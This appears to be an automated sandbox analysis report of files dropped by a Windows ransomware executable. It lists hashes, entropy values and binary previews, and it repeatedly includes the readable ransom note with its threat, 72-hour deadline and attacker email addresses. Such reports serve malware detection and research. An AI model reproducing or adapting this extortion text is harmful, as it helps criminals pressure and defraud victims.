                                                                                                    SHA-512:63C0AA30B7475DC89C339A6DC305116F4DACBE897E378399EA1F1AEDC18C7A6B34A62BE8FF6E4F1E6B69940D7C85782D560F640678F88A87B88C4754EC331EC3
                                                                                                    Malicious:false
                                                                                                    Preview:u.`..ZUS...5.N...>.S..W.5...8.....A.^.p.dhv.J....Y.*.a..-rU........l..@.$vS..^...nqYG..jb....n.E.H..[eX.*......q.........H|..:$. .k:...%#....Usw..e.....5.e.f.yP..i...W...hv...X]....n{..._q.l..W........[..$.tH.V.4w...wr.:......D6>WN=.B.....0..N..b)......D.....T..S.x..|....qGGd..../..,Gx...)dYr.F.!...!...8/.L....kOr78.j....Y....2./V.Y.&.}-M*q....Twbz..i-.7O..m.G.>S.I.#...NZ^...)..s.......eHd.f...0.E..+.I.F.o:.7UA....Z..[.?nf;....y...w..5...?0.sb.~|...z.B...z...J..a......h.;.....}.@T...a..~.N....s...~|..CH(..%.a..`.+......ARu3..-.....;..G5|[.`.~..oG4..@R.V...oFSl.7..=.......q.iYE_..g.....8.Jz.tXI2.a....O..sP..!X........Y_..mgY.i....G......R.~l|..i.*.E.s.S.*...J.....A..a.L45a.}S^....K|...?...Ix2=.f.e..k|....\d.R....U..crA!.3....<.z./eP.....K.\..m..s.5.Lw...>~a@...M...8*...C.".LR......L..V..^}$N...e......6.+.3k..o'Z]w.B.5.."T.?)...k.M..n.\#.....E'$...j.}....<.,.......}8pa........K.u.......L.~..}.1.f...RF<.3.Y.Gl.G.Q.u&+.,..r...47....^.6...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.016757518354228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:BOtly1UwtAQOTBGaNKJknOQfdJ/kOD85cFPGcpy3scDlYvo3I60D5JkzHpOHn:BOt/wtAQ8BGnJ6OQffcM8CUGy39DCAJw
                                                                                                    MD5:242F7A3F7DE71A8D8BE6C099DECA9F04
                                                                                                    SHA1:D7D77FEF0D91E9DE32F0F84AF4BC269BE214F02D
                                                                                                    SHA-256:0CB2E2B8EF3AA4BA650DA813B6B6B6BFF5751CC153181CE4569CB94FD414DE7D
                                                                                                    SHA-512:8C814FAFDA3856ADB3AC957CF3A5221C2E3CDE10002E1B5C26F97ED5E2C73117BB95DEDCD7B88C5CABCD8D6F5F0FB626E34EBA28E17BABD408DF601CA905C50F
                                                                                                    Malicious:true
                                                                                                    Preview:<v.e.d.o]A...vH/..........4W.Bf.. ........HoD.H...A.........aa../.[.R...1....{.b..:.4"..C0.]..'.../...LD...:.]5.KHgP...v.t...e.Q%.N.=.N]>L....'... ..r......W!.......Ow..t..{uT..Z..`..DL..I9A\x.....!.Ij.y.|=.A..]..lR0.....R]--../......o.....C..S...p.....H..s<a.t@.N..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1809912695354934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:z+I3GUALXuhAdOOMxtZcHwKrB+JZzl18p1kEIghDch:xiL+hKOOMxMHwVJZz/8p1kpghDch
                                                                                                    MD5:F5EAC1EB7778E62BBE6714027A6163B4
                                                                                                    SHA1:5813D6219B687054F510577E2E3FE7DA1583A861
                                                                                                    SHA-256:B2329D5AE8F43678E6D74B79AA4638D73D1B9007C75CE27D2FE9A26B86308C15
                                                                                                    SHA-512:4F7FBC2DCBDBB45731ECADEE69CCF2F40C3150600435A33B98641FA43C107FDBF3DD15D343CF66B54674C252A0D9A2E48C9464EBD2557A05AADC4E41769F01B3
                                                                                                    Malicious:false
                                                                                                    Preview:?...'.y.P.=.T.:.sD........N1.'.v.!.........Q......@.;.#\e....lc3sy..@...<.W..T'O..'.c.r^...h.....Q..(I.1....,Y...$..q...."=@.Us.Z.......T.=I.e"..|.%.h-.v.......Wr.U >.h:M.c.1....!.[]..w..L.....E.>.O}.....J....8.R......0.k.W.N.j..Qc..n\....2.l.y.t..}.D.B%WL.?.K.'.B>b....yx....Beumx.V......r&.8..A......Jn._......R.FFs..i........(...y.$.p.. 1{....'......K.v......I.2...4{..z....i.RdV.R6.}.....9....l3=O.E/%..o{.R...\....c.Hk.+g.....P...^.60......|.q.v.:.R:....Ops_ku...p....c.'.5.~....{...`..C.s....4:..>.0 ....x.R...\..U.&~.......?.Rp.v.J..B.]..<7..SU..r.H..r...t.h....9.64'BJ..&.A.8..p...AI..$.Tsh.j...u..,2....zf....6..!....pj./..(`=....7..W.y..c?>C...d..3$.=.tndIoV.:d.h...g........U....38.....0/...:*.D..@..{*..b.4~.0j\.3...4........o....P.B..M...x3....k.8Z...E".. uOS..:J6.<&.?.lV...#.._......\..Ro!I=.).......$..$^&.|.;qE.$..E6..h.5.TN..n....pb=...9.p.._O-.,:B:~..X..b..O.@"..!.)...F9...s.....(....N....|-.. ......v.5P.k.....k.....|.!...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.155407688201581
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JzTWjmFvuRWAz9g11adz/2Nsejk+x7X9TF9BAaQ9JUpeflkG:x2mPsL8jXZFABJUpeflV
                                                                                                    MD5:EBDA7267825551F233DF554915242B4E
                                                                                                    SHA1:130930FE2119BEBA6D393E776C7A1F9837AF8306
                                                                                                    SHA-256:D8F07283195D2A059D2010D57102A1D74B90D98CCB912A68E4ECA53BF65D80C8
                                                                                                    SHA-512:7C22A40CB87F7836BE5FAE90EFD8B6BA1F761D4E5BFB1FB0279855143FBFAB407D262C6CE7347CA2C74BF6B2A73BDA71855CD62831B077BEBC4FA80123447FDC
                                                                                                    Malicious:true
                                                                                                    Preview:...p......!.w5.R]C.^..Q%.D.&..S..v?...y..\...?...!.<...s.E..j.H..Y.PL...X]N..K.}+.(..eo.P-..J/...#iN...V.Z..3.g.#......0,>{!..,.....`!Dg}{._...8...\1~..j..!.Y./o.q.u.y.....'...J.......&)y. ^.TY....2.7.N9....y.<...u ..E...P..1n..\...A...z......B.. .Ldk.........A...J;.^...st.x_Y...js.t<..s..`-.=T\|..|r.GhG.!.......g5_..YN5.M...ve.j..{o......G.......*K..N....Z...+Q.h^..?}V.....:,....\..6u.g.....^.=...x.D)...&....H....OX..I".#gRnZ.?.(/-.4z:5%0.|.J~.;x*.Iw&p...m'.2\.....(..8.M...m?....S..Y.....6..F[..ps..r.&...QiY...)P.n.1..91V....3gi..U.G~..^...Y.+.N.1.J.._.`u..k...:..B.....L..6.3.b...L._p..u.h2...*{..YR.}...........~.....>Ct..P.......9 Z..X.Q.4....e.{...*k.n......_dj..i..7K.........T.y6.....Bm.+.Z....R.j.ne%v.."...d...r.....Vy..q..#...`.{'Q..w-{.."...5.&s..:... .M5u.%......Hi#.d..{....<...o.@4..2.:fU....S~z..s.li.Z..$.<.%y.?...F...r..9.>....S*.0?`.y8..,>...C.8.c..sB..BO}..c".w.|...f.....^..).I.|.=..-...}P<.U..=I7..e.>y.%..p..x....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6116023924198521
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Q/rDO/zpZ7NyTrzJSxo0KhWMx2Y4W+oiSiVZTKrDHoUJ0H:yetRNyJ0oTxvzpYZEbJ0H
                                                                                                    MD5:DB68168E1DF0D3B5C9155E807229EAFA
                                                                                                    SHA1:6EB20B7BD1DDED76E69ED1FA9C1947DB549A44F5
                                                                                                    SHA-256:388C23232F5D74766B65352F6F42F73B8778964A7DE11073A5E9CE3911358308
                                                                                                    SHA-512:CE88A7E7D89F004B861F1580889D5FEA095F61B55765E55DAF77B68CBB3A19008C9036F1FD74410219D60AF81E6DAD1176A9905DA99210A97563454AC07098D5
                                                                                                    Malicious:true
                                                                                                    Preview:.ZR..*...SW.R~.i.S..sb4G......w#GM........'Q..x1..........J......$.h....XW.L.".J....m?.0E....T{..............5.h.B..%>e.p.... k.9..........5Q.<.=......./.F.+....S..V.L.v....Xe.$..).......\..{&v......Ig.R..-............=..$.Y.z.4`Lf;MA-v.w...b....q.[...+.@.V,:.....[y.....8.....+..c..}y.[......3..?.;...S..h....a.^..#i....C....7*[..j G.MWv#...V......T....H.....|...=<JQ.........c^.+dV.......g1z........?..s..G.Y(pn....VvM..^..,.4..,{/.. sf.+={.W.......(.:.o.:.(.C}....':.......@......X.......#..&......3.G1..'..v......D... .............D._20.'C.......s.....<{.@..'?.<"..\.0.6./f,P:h.......gz...e..J...8.(.....".......I......wc.o..dl&.k..&oU?......Z.l....U>tP.@..,.m....i3.:.K1...B];...`./....D....B].............."I.?.Z......j...fQ..@. ....>.zF).EQ.o.8....t..H...SO......b......v....B....c..d..1&.QE...w......1]..m.........a../.k.!+.4....2...I8..q^6=@...}^E.O.;....../C.h....4...>~~.3H..nLbT.....o.W.V.1.Km....Q..H....<..]xT.;'.:..`F)......&.j....`..H.#.2...88..(.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6116023924198521
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Q/rDO/zpZ7NyTrzJSxo0KhWMx2Y4W+oiSiVZTKrDHoUJ0H:yetRNyJ0oTxvzpYZEbJ0H
                                                                                                    MD5:DB68168E1DF0D3B5C9155E807229EAFA
                                                                                                    SHA1:6EB20B7BD1DDED76E69ED1FA9C1947DB549A44F5
                                                                                                    SHA-256:388C23232F5D74766B65352F6F42F73B8778964A7DE11073A5E9CE3911358308
                                                                                                    SHA-512:CE88A7E7D89F004B861F1580889D5FEA095F61B55765E55DAF77B68CBB3A19008C9036F1FD74410219D60AF81E6DAD1176A9905DA99210A97563454AC07098D5
                                                                                                    Malicious:false
                                                                                                    Preview:.ZR..*...SW.R~.i.S..sb4G......w#GM........'Q..x1..........J......$.h....XW.L.".J....m?.0E....T{..............5.h.B..%>e.p.... k.9..........5Q.<.=......./.F.+....S..V.L.v....Xe.$..).......\..{&v......Ig.R..-............=..$.Y.z.4`Lf;MA-v.w...b....q.[...+.@.V,:.....[y.....8.....+..c..}y.[......3..?.;...S..h....a.^..#i....C....7*[..j G.MWv#...V......T....H.....|...=<JQ.........c^.+dV.......g1z........?..s..G.Y(pn....VvM..^..,.4..,{/.. sf.+={.W.......(.:.o.:.(.C}....':.......@......X.......#..&......3.G1..'..v......D... .............D._20.'C.......s.....<{.@..'?.<"..\.0.6./f,P:h.......gz...e..J...8.(.....".......I......wc.o..dl&.k..&oU?......Z.l....U>tP.@..,.m....i3.:.K1...B];...`./....D....B].............."I.?.Z......j...fQ..@. ....>.zF).EQ.o.8....t..H...SO......b......v....B....c..d..1&.QE...w......1]..m.........a../.k.!+.4....2...I8..q^6=@...}^E.O.;....../C.h....4...>~~.3H..nLbT.....o.W.V.1.Km....Q..H....<..]xT.;'.:..`F)......&.j....`..H.#.2...88..(.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.1557206072318555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ZF3pwB3rYLi4/O1tBUoGANmew0JibXhqWMoO6Vgm81hJACdMRn:ZF319oBuANTAcJFG8Zndyn
                                                                                                    MD5:20DBB43DA988CC9ECCBBA21B2E249AB7
                                                                                                    SHA1:669C13A473EFCB2DA0C44DECDB55DA1BB895321E
                                                                                                    SHA-256:DBFAB4026CEB8C38673B73D7D8AA4A0CDED340431DA21AB8F0F6D6FA54CA5C0E
                                                                                                    SHA-512:F35D175B75DE83F08DD5CAF7E1735DB4C36712B68F59FB68534B391B4EB54743061454BA70F26C952CCD8AECF2DC3A5D021B1697C1E699C743A13554950FFABC
                                                                                                    Malicious:true
                                                                                                    Preview:].L`..p..)J...j............$.pr.J^..IA.L.....1...HBQ....n..v]o..E.3?..~...g.B.\...8.h|....j....W.%..5.o...J...f.r....P..dN.l./..z..*C]..:.*Qhe...#...m*..s.%xW..`CjS.....|.S..Z...am...H.s.u......=jm....mEM.....&V..T.2`.q..._h.....2..9o....\E.g,.?.K..)..b.Aa.....>.0+h0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.155407688201581
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JzTWjmFvuRWAz9g11adz/2Nsejk+x7X9TF9BAaQ9JUpeflkG:x2mPsL8jXZFABJUpeflV
                                                                                                    MD5:EBDA7267825551F233DF554915242B4E
                                                                                                    SHA1:130930FE2119BEBA6D393E776C7A1F9837AF8306
                                                                                                    SHA-256:D8F07283195D2A059D2010D57102A1D74B90D98CCB912A68E4ECA53BF65D80C8
                                                                                                    SHA-512:7C22A40CB87F7836BE5FAE90EFD8B6BA1F761D4E5BFB1FB0279855143FBFAB407D262C6CE7347CA2C74BF6B2A73BDA71855CD62831B077BEBC4FA80123447FDC
                                                                                                    Malicious:false
                                                                                                    Preview:...p......!.w5.R]C.^..Q%.D.&..S..v?...y..\...?...!.<...s.E..j.H..Y.PL...X]N..K.}+.(..eo.P-..J/...#iN...V.Z..3.g.#......0,>{!..,.....`!Dg}{._...8...\1~..j..!.Y./o.q.u.y.....'...J.......&)y. ^.TY....2.7.N9....y.<...u ..E...P..1n..\...A...z......B.. .Ldk.........A...J;.^...st.x_Y...js.t<..s..`-.=T\|..|r.GhG.!.......g5_..YN5.M...ve.j..{o......G.......*K..N....Z...+Q.h^..?}V.....:,....\..6u.g.....^.=...x.D)...&....H....OX..I".#gRnZ.?.(/-.4z:5%0.|.J~.;x*.Iw&p...m'.2\.....(..8.M...m?....S..Y.....6..F[..ps..r.&...QiY...)P.n.1..91V....3gi..U.G~..^...Y.+.N.1.J.._.`u..k...:..B.....L..6.3.b...L._p..u.h2...*{..YR.}...........~.....>Ct..P.......9 Z..X.Q.4....e.{...*k.n......_dj..i..7K.........T.y6.....Bm.+.Z....R.j.ne%v.."...d...r.....Vy..q..#...`.{'Q..w-{.."...5.&s..:... .M5u.%......Hi#.d..{....<...o.@4..2.:fU....S~z..s.li.Z..$.<.%y.?...F...r..9.>....S*.0?`.y8..,>...C.8.c..sB..BO}..c".w.|...f.....^..).I.|.=..-...}P<.U..=I7..e.>y.%..p..x....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):532746
                                                                                                    Entropy (8bit):4.256925069361227
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:V6O5ocEznn+Si6iEwyW2hk/PQJYTNkDfSe8f7b:0O+cEJi6iEwyN8jTNkDKeYb
                                                                                                    MD5:CDF9EE59223E82B3DB8F6538C6C5E6A9
                                                                                                    SHA1:84E22B0493B0604163020C6B179D5EB2012436F0
                                                                                                    SHA-256:8115A7A670FAC312D56495E5ED13A4780344995FFF179ABDD75C0BEF35022D41
                                                                                                    SHA-512:280189673962090529F4252427F412F87C5FD333C924E72CDB474AAD32D4B750673F55B26084977529D5D0156F482760C52C96DB2333CCA25E1F8F209B4D8C1C
                                                                                                    Malicious:true
                                                                                                    Preview:.Y.0.{....@..].R.W..ez...E.\0.K'.Ps._..Tn...=.1.I .L.Uj.......%}.!...N.tD.~..v..N..}.r......E..kG..m.P...v.~.....l...f...k"$.n.}/.X.;...w.Yy....hV.;t. .y.L.N..[h%>.?p.:.7.X..n.....(.8.n.i.@#m...}.].H@~..y8Y%x......[...?L..E.*.T..K,....%yZ../.....oh|..od.Z.u..8..4Z.X..rZ.s.+..b. .'..Y.D.........U.1....wDm.7... bI../. ..S..(Z..p..y.....f..Z.`..#.00uu.R)PM.oN...<d.U...wf.DA}....e.u.~..R.y...5......@..........>.~{?R..6X..w._#....}..2!O.H+....3A1.t(1et.f...&...L7..H.z..p^OXc>.@8....d.Z....Y.!.u}..e1c...a..2...]z.9e...4'....$; {t_f.uA..5...ih._y.#.....-....f:....2h....S.!../z..!.6.......Y.l...,.]..X..=..%.qXL..n...E.5U..h0>.V.:.....)..|'),}.;?4.&q......X9...K.;.s..@.8..].E:.....'&.W..i"L.......@.60%d4<>L....e.t/...........)}....pf..<+.G......i..H?+(.&....Ta..F.o(.g...F.F-....Y..VM....y.+z.......@.......D..O.......f..z.......7e..j..VF]l........d.....iE.^[d.XmN.../..k8...LX...q...R...4n..Q..(b8..d...s.?oH"".!%.u.C.G..n.V!7...n...;..u......8..n.....T...x.....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6520353263508165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kmC+H4ADIOsp1oABjpdodqDIO8RwVci/LKnsyTPcT6jt1QlgZXZ5:km5M7oAtIdIIQVV/LKs2PB1Qu5j
                                                                                                    MD5:B6B83D6423158AC84062816EC310525A
                                                                                                    SHA1:62F89B81A59165E2D35A159EC9FB5025F5E42ED9
                                                                                                    SHA-256:B388108BD530E5CF49EAC9FD9B6CD699DA4D8517B8CC740CAF355B184A1ADB38
                                                                                                    SHA-512:EB57845AC0D56ACFFE731F31A071D631A6CD92412B7061E540B83F3BE7D730B5737F67DAB14F3EB2F3078C40F57818865CC5B1275D932F4A8FC8962CC2BABA78
                                                                                                    Malicious:true
                                                                                                    Preview:.....f.R..&.y.....SJ..f.&(mi .P.a.s.L.I...`.Q2..U...#.y.....s.....M.Z...<`...[.Ff@.FFE...+a..F..U..W,.HY..x.3H..N.*.B.IxP..$..>....=r..Smw.r.v....h.3......h.h......Vz.`ig.V....}.r...9..?.7.V..%uI..g.......Z........C..?4..d..W.....R.83./Y.\D...y.a.x......7SF.ZE00..1.Hh.1....=8.....\...d5.d3._..y-.~....&..$.C.'K.......h.i.*.I..3...!.? ..6X..c.]hM..QR0..s.U......Q....4..>.!..`k. ..4...}.......(.C:}....Y`.x..t..k(.|^F5..T..w~e..=.x.c.;...qW_S$.Q.j.E...n1...i.]8u\...m.q..3#@@..$....U.;.f!.`^;'%..(.vCi.P&..j@....Xx.`;4J/.-B>.c.... +.......a......~..X..t6.=.?9.T.\...ly.|.(#.$...'.K5-H.V....I#.c@&.`.4.m{}......n...k..V....F3...... .n.U...&(x.26....s...eI....u......Bm..qa...Z.c....0.Ia...9..V0...5.0....V...8.>..T_FCq.l.v........%.a.1..W.....u..=....q'i...g.|...9..3.!1....^.....ec.720...E.)...O...`..E...;..)..h..., T1.=.t..0!~...;.W.-.K}..I.;..(.r.'s..Q.F...Zf.|......$...|="L.B.L..O....ZA4.Ht.Al..=..5p..O?......O.*..._|.JEgI...p..Dc.+Yo.U\S.FM
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6520353263508165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kmC+H4ADIOsp1oABjpdodqDIO8RwVci/LKnsyTPcT6jt1QlgZXZ5:km5M7oAtIdIIQVV/LKs2PB1Qu5j
                                                                                                    MD5:B6B83D6423158AC84062816EC310525A
                                                                                                    SHA1:62F89B81A59165E2D35A159EC9FB5025F5E42ED9
                                                                                                    SHA-256:B388108BD530E5CF49EAC9FD9B6CD699DA4D8517B8CC740CAF355B184A1ADB38
                                                                                                    SHA-512:EB57845AC0D56ACFFE731F31A071D631A6CD92412B7061E540B83F3BE7D730B5737F67DAB14F3EB2F3078C40F57818865CC5B1275D932F4A8FC8962CC2BABA78
                                                                                                    Malicious:false
                                                                                                    Preview:.....f.R..&.y.....SJ..f.&(mi .P.a.s.L.I...`.Q2..U...#.y.....s.....M.Z...<`...[.Ff@.FFE...+a..F..U..W,.HY..x.3H..N.*.B.IxP..$..>....=r..Smw.r.v....h.3......h.h......Vz.`ig.V....}.r...9..?.7.V..%uI..g.......Z........C..?4..d..W.....R.83./Y.\D...y.a.x......7SF.ZE00..1.Hh.1....=8.....\...d5.d3._..y-.~....&..$.C.'K.......h.i.*.I..3...!.? ..6X..c.]hM..QR0..s.U......Q....4..>.!..`k. ..4...}.......(.C:}....Y`.x..t..k(.|^F5..T..w~e..=.x.c.;...qW_S$.Q.j.E...n1...i.]8u\...m.q..3#@@..$....U.;.f!.`^;'%..(.vCi.P&..j@....Xx.`;4J/.-B>.c.... +.......a......~..X..t6.=.?9.T.\...ly.|.(#.$...'.K5-H.V....I#.c@&.`.4.m{}......n...k..V....F3...... .n.U...&(x.26....s...eI....u......Bm..qa...Z.c....0.Ia...9..V0...5.0....V...8.>..T_FCq.l.v........%.a.1..W.....u..=....q'i...g.|...9..3.!1....^.....ec.720...E.)...O...`..E...;..)..h..., T1.=.t..0!~...;.W.-.K}..I.;..(.r.'s..Q.F...Zf.|......$...|="L.B.L..O....ZA4.Ht.Al..=..5p..O?......O.*..._|.JEgI...p..Dc.+Yo.U\S.FM
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.229404257471757
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:P8HwzN9qMj/a8qtDmZrk8loHFitSEAf0lmTfYf6BOi2bYn:P88LqMj/a8sDsrkNk2kAOun
                                                                                                    MD5:75378ECFB84FD1675E84CA71E3B70EA0
                                                                                                    SHA1:C03125F02F7CC723DD8EE2C2DA9DD280037F90AD
                                                                                                    SHA-256:5AF59F2622877C0CDE992078A5169A4803A351526926A509FB5EE17636F84334
                                                                                                    SHA-512:30DCF4839C7960347C5D908F58EA887357077515CB015424A1DD3F7A3DAFC6244AE4B6E8B359DCCBEFF60D252048B7DA2754853AE6F854CFA4EE39804D2AEEEE
                                                                                                    Malicious:true
                                                                                                    Preview:.-..b'.......t.................K..5I.S*.IZ...W.).h..p.*N.C.)..C...5*...<..,......0\.U.i....#....JC..u..$...........*...}....;..OJ}..@.cP.s..ni..d.Ze.....j..{..Z\.U....hu..D.8D..o.H.........g.L.......A..?.. ......#t.[9.Qd.Y."O....G.........f.>F.......B.[..U.V.r%9Ur...c.....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):532746
                                                                                                    Entropy (8bit):4.256925069361227
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:V6O5ocEznn+Si6iEwyW2hk/PQJYTNkDfSe8f7b:0O+cEJi6iEwyN8jTNkDKeYb
                                                                                                    MD5:CDF9EE59223E82B3DB8F6538C6C5E6A9
                                                                                                    SHA1:84E22B0493B0604163020C6B179D5EB2012436F0
                                                                                                    SHA-256:8115A7A670FAC312D56495E5ED13A4780344995FFF179ABDD75C0BEF35022D41
                                                                                                    SHA-512:280189673962090529F4252427F412F87C5FD333C924E72CDB474AAD32D4B750673F55B26084977529D5D0156F482760C52C96DB2333CCA25E1F8F209B4D8C1C
                                                                                                    Malicious:false
                                                                                                    Preview:.Y.0.{....@..].R.W..ez...E.\0.K'.Ps._..Tn...=.1.I .L.Uj.......%}.!...N.tD.~..v..N..}.r......E..kG..m.P...v.~.....l...f...k"$.n.}/.X.;...w.Yy....hV.;t. .y.L.N..[h%>.?p.:.7.X..n.....(.8.n.i.@#m...}.].H@~..y8Y%x......[...?L..E.*.T..K,....%yZ../.....oh|..od.Z.u..8..4Z.X..rZ.s.+..b. .'..Y.D.........U.1....wDm.7... bI../. ..S..(Z..p..y.....f..Z.`..#.00uu.R)PM.oN...<d.U...wf.DA}....e.u.~..R.y...5......@..........>.~{?R..6X..w._#....}..2!O.H+....3A1.t(1et.f...&...L7..H.z..p^OXc>.@8....d.Z....Y.!.u}..e1c...a..2...]z.9e...4'....$; {t_f.uA..5...ih._y.#.....-....f:....2h....S.!../z..!.6.......Y.l...,.]..X..=..%.qXL..n...E.5U..h0>.V.:.....)..|'),}.;?4.&q......X9...K.;.s..@.8..].E:.....'&.W..i"L.......@.60%d4<>L....e.t/...........)}....pf..<+.G......i..H?+(.&....Ta..F.o(.g...F.F-....Y..VM....y.+z.......@.......D..O.......f..z.......7e..j..VF]l........d.....iE.^[d.XmN.../..k8...LX...q...R...4n..Q..(b8..d...s.?oH"".!%.u.C.G..n.V!7...n...;..u......8..n.....T...x.....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
